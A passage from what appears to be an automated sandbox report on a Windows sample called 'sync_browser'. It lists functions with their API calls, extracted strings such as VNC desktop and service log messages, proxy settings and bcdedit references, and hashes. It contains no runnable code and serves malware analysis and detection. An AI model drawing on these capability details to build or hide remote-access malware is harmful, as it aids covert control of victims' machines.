                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$locdom1
                                                                      • API String ID: 1788981264-2648182776
                                                                      • Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                      • Instruction ID: 057673f485af0db4113077fda8ce579aae7a6361a5cfb27b2147037615542b67
                                                                      • Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                      • Instruction Fuzzy Hash: 70014C25A1854E81FB61BB38E4B53B5A351EF49B04FC0003BE50DC629ADE3CE548C662
                                                                      Function 00007FF7E50C7F50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7F8D
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7840
                                                                        • Part of subcall function 00007FF7E50C77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C787D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$locdom3
                                                                      • API String ID: 1788981264-1943432916
                                                                      • Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                      • Instruction ID: 1be9c55e445ea2b4be0c3815375e1aa450ca528e07c591ff84a6554e2a9789cf
                                                                      • Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                      • Instruction Fuzzy Hash: 49015E25A1854E81FA61FB34B4B13BAE391EF99B04FC00437E50DC659ADE3CE145C672
                                                                      Function 00007FF7E509C210 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFindMode$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2885216544-0
                                                                      • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                      • Instruction ID: 370f3c4ce269f2cd066d5b8ec976414286e915b68b50d50b4e428a8de09a26eb
                                                                      • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                      • Instruction Fuzzy Hash: DE016935B0874986DA609B25B4543AAA361F74DFE0F805231EE6D83798DE3DD8458B10
                                                                      Function 00007FF7E5075A60 Relevance: 50.9, APIs: 17, Strings: 12, Instructions: 154libraryloaderfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                                      • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                                      • API String ID: 1650122287-1031704962
                                                                      • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                      • Instruction ID: 5a2a75b5337e242b690f611eafd48c38befcc1bc02ef5961323686725cc35137
                                                                      • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                      • Instruction Fuzzy Hash: A9811031608A8A81EB21EF20E4643FD63A0FB49F99F845136DD5D87298EF7CD645C721
                                                                      Function 00007FF7E50A0D40 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 239windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                                      • String ID: F
                                                                      • API String ID: 2202639625-1304234792
                                                                      • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                      • Instruction ID: 28d5fe7010a77502d525162c360d4022f90b30962fa77cc1d99fe6128045df51
                                                                      • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                      • Instruction Fuzzy Hash: 13C16236A0469A8BE750DF65E558EAE73B9FF48B84F410537EE0983708DF789844CB21
                                                                      Function 00007FF7E5073F30 Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 141libraryregistryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
                                                                      • String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
                                                                      • API String ID: 1337014749-2363801694
                                                                      • Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                      • Instruction ID: 525737a7d1a29e6720bf65ceafd487d536a03ab632dcd52f590bc6fcbbbcde25
                                                                      • Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                      • Instruction Fuzzy Hash: 6E714636608B8686EB20EF15F46476AB3A0FB85F54F90513AD95E83798DF3CD045CB12
                                                                      Function 00007FF7E507B550 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 227COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
                                                                      • String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
                                                                      • API String ID: 3609861302-2295524587
                                                                      • Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                      • Instruction ID: ef5082032136ac5392c64d73e9511c99f89015550c92b417316ac36d1cef527a
                                                                      • Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                      • Instruction Fuzzy Hash: EFA16E25A0968A85FE55BB34E5713B9A390AF54F84FC84437EA0D87799FE3CE441C322
                                                                      Function 00007FF7E509F040 Relevance: 35.2, APIs: 5, Strings: 15, Instructions: 207threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
                                                                      • String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
                                                                      • API String ID: 421987145-2663527212
                                                                      • Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                      • Instruction ID: c36656530460564b626b5ad881aa9947d26baa9cae17f3eb3b5746eaf2181768
                                                                      • Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                      • Instruction Fuzzy Hash: 70A10C71A0868B85FA61BB28E4603F9A350EB84F44FD44437E90EC6299DF7CE549C362
                                                                      Function 00007FF7E50837E0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
                                                                      • String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
                                                                      • API String ID: 3443580464-3826360582
                                                                      • Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                      • Instruction ID: d581e0f478767c319a47dc33bec81c27e88c4f0a4919594bd58b274980d931ff
                                                                      • Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                      • Instruction Fuzzy Hash: 18613C35A04B8A99E720DF64F8513E973A0FB48768F801233EA6D866D8EF3CD105C351
                                                                      Function 00007FF7E507CF80 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 254libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
                                                                      • String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
                                                                      • API String ID: 3955186772-955988753
                                                                      • Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                      • Instruction ID: 0127c83b7d96475a763920602842d88a4973185872b221dce2fa432071ca7372
                                                                      • Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                      • Instruction Fuzzy Hash: 22B1B422A0C78991EB10FB34E4603B9A791FB45B94FD44136EA4D87AC9DF3CD506C722
                                                                      Function 00007FF7E50900F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
                                                                      • String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
                                                                      • API String ID: 3199031719-36275550
                                                                      • Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                      • Instruction ID: 92af3cdc1c44095a1571fb98b527b0d40a5f1132a77e01efcb084f14b9f3643b
                                                                      • Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                      • Instruction Fuzzy Hash: 1E517F2670874A86EA64FB25F4603B9A3A0FF88F84F844036E94D87759DF3CE145C712
                                                                      Function 00007FF7E50DA5B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 117threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
                                                                      • String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
                                                                      • API String ID: 55935355-432259686
                                                                      • Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                      • Instruction ID: 4f779c38e57cfc9fb890e2240c6967f4b0889570ac571efbee72a558253a9de0
                                                                      • Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                      • Instruction Fuzzy Hash: A4514131A0868B82FB60BB71B9647B5A3A1AF44F84FC04437E54DC2658EE3CE505D762
                                                                      Function 00007FF7E50A3260 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 89threadsynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
